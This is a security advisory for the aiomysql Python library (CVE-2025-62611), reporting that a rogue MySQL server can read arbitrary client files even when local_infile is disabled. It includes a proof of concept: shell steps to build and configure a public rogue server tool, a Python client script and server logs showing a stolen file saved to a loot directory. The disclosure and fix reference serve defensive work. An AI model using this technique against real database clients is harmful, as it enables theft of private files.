ghsa-r397-ff8c-wv2g
Vulnerability from github
Published
2025-10-22 16:47
Modified
2025-10-23 17:38
Severity ?
8.2 (High) - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Summary
aiomysql allows arbitrary access to client files through vulnerability of a malicious MySQL server
Details

Summary

The client-side settings are not checked before sending local files to MySQL server, which allows obtaining arbitrary files from the client using a rogue server.

Details

It is possible to create a rogue MySQL server that emulates authorization, ignores client flags and requests arbitrary files from the client by sending a LOAD_LOCAL instruction packet. Related to CVE-2019-2503.

PoC

First, start up a rogue MySQL server that ignores client-side flags and sends LOAD_LOCAL packet to the client – tested with https://github.com/rmb122/rogue_mysql_server

  1. Create a file to be stolen by the rogue server: echo "gotcha" > /tmp/my_secret_file.txt
  2. Clone the repo: git clone git@github.com:rmb122/rogue_mysql_server.git && cd rogue_mysql_server
  3. Build the server: make rogue_mysql_server
  4. Generate a sample config: rogue_mysql_server -generate
  5. In config.yaml change file_list to ["/tmp/my_secret_file.txt"]
  6. Run the server: ./rogue_mysql_server -config config.yaml

Next, the vulnerability can be seen in action with the following script, which can be run in a second terminal: ```python3 import asyncio

import aiomysql

loop = asyncio.get_event_loop()

async def test_example(): conn = await aiomysql.connect( host="127.0.0.1", port=3306, user="root", password="", db="mysql", loop=loop, local_infile=0, # note that we explicitly forbid local_infile )

cursor = await conn.cursor()
await cursor.execute("SELECT 1")
print(cursor.description)
r = await cursor.fetchall()
print(r)
await cursor.close()
conn.close()

loop.run_until_complete(test_example()) ```

The rogue server will output log messages indicating successful file read and save the contents in the loot/ directory level=info msg="Client from addr [xxx], ID [1] try to query [select 1]" level=info msg="Now try to read file [/tmp/my_secret_file.txt] from addr [xxx], ID [1]" level=info msg="Read success, stored at [./loot/xxx/1757403852610__tmp_top_secret_file.txt]" level=info msg="Client leaved, Addr [xxx], ID [1]"

Impact

This vulnerability impacts products and environments that require connection to untrusted MySQL servers or allow the possibility for them to be compromised.

Fix suggestion

Can be fixed by porting relevant changes from PyMySQL – https://github.com/PyMySQL/PyMySQL/commit/b5e17cee46e0706dbfd707cdd2024452f0fb3267

Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "aiomysql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62611"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-22T16:47:10Z",
    "nvd_published_at": "2025-10-22T20:15:38Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe client-side settings are not checked before sending local files to MySQL server, which allows obtaining arbitrary files from the client using a rogue server.\n\n### Details\nIt is possible to create a rogue MySQL server that emulates authorization, ignores client flags and requests arbitrary files from the client by sending a LOAD_LOCAL instruction packet. Related to CVE-2019-2503.\n\n### PoC\nFirst, start up a rogue MySQL server that ignores client-side flags and sends LOAD_LOCAL packet to the client \u2013 tested with https://github.com/rmb122/rogue_mysql_server\n\n1. Create a file to be stolen by the rogue server: `echo \"gotcha\" \u003e /tmp/my_secret_file.txt`\n2. Clone the repo: `git clone git@github.com:rmb122/rogue_mysql_server.git \u0026\u0026 cd rogue_mysql_server`\n3. Build the server: `make rogue_mysql_server`\n4. Generate a sample config: `rogue_mysql_server -generate`\n5. In `config.yaml` change `file_list` to `[\"/tmp/my_secret_file.txt\"]`\n6. Run the server: `./rogue_mysql_server -config config.yaml`\n\nNext, the vulnerability can be seen in action with the following script, which can be run in a second terminal:\n```python3\nimport asyncio\n\nimport aiomysql\n\n\nloop = asyncio.get_event_loop()\n\n\nasync def test_example():\n    conn = await aiomysql.connect(\n        host=\"127.0.0.1\",\n        port=3306,\n        user=\"root\",\n        password=\"\",\n        db=\"mysql\",\n        loop=loop,\n        local_infile=0, # note that we explicitly forbid local_infile\n    )\n\n    cursor = await conn.cursor()\n    await cursor.execute(\"SELECT 1\")\n    print(cursor.description)\n    r = await cursor.fetchall()\n    print(r)\n    await cursor.close()\n    conn.close()\n\n\nloop.run_until_complete(test_example())\n```\n\nThe rogue server will output log messages indicating successful file read and save the contents in the `loot/` directory\n```\nlevel=info msg=\"Client from addr [xxx], ID [1] try to query [select 1]\"\nlevel=info msg=\"Now try to read file [/tmp/my_secret_file.txt] from addr [xxx], ID [1]\"\nlevel=info msg=\"Read success, stored at [./loot/xxx/1757403852610__tmp_top_secret_file.txt]\"\nlevel=info msg=\"Client leaved, Addr [xxx], ID [1]\"\n```\n\n### Impact\nThis vulnerability impacts products and environments that require connection to untrusted MySQL servers or allow the possibility for them to be compromised.\n\n### Fix suggestion\nCan be fixed by porting relevant changes from PyMySQL \u2013 https://github.com/PyMySQL/PyMySQL/commit/b5e17cee46e0706dbfd707cdd2024452f0fb3267",
  "id": "GHSA-r397-ff8c-wv2g",
  "modified": "2025-10-23T17:38:48Z",
  "published": "2025-10-22T16:47:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aio-libs/aiomysql/security/advisories/GHSA-r397-ff8c-wv2g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62611"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aio-libs/aiomysql/pull/1044"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aio-libs/aiomysql/commit/32c4520dae3711367ded74a4726dcb8bb8919538"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aio-libs/aiomysql"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "aiomysql allows arbitrary access to client files through vulnerability of a malicious MySQL server"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.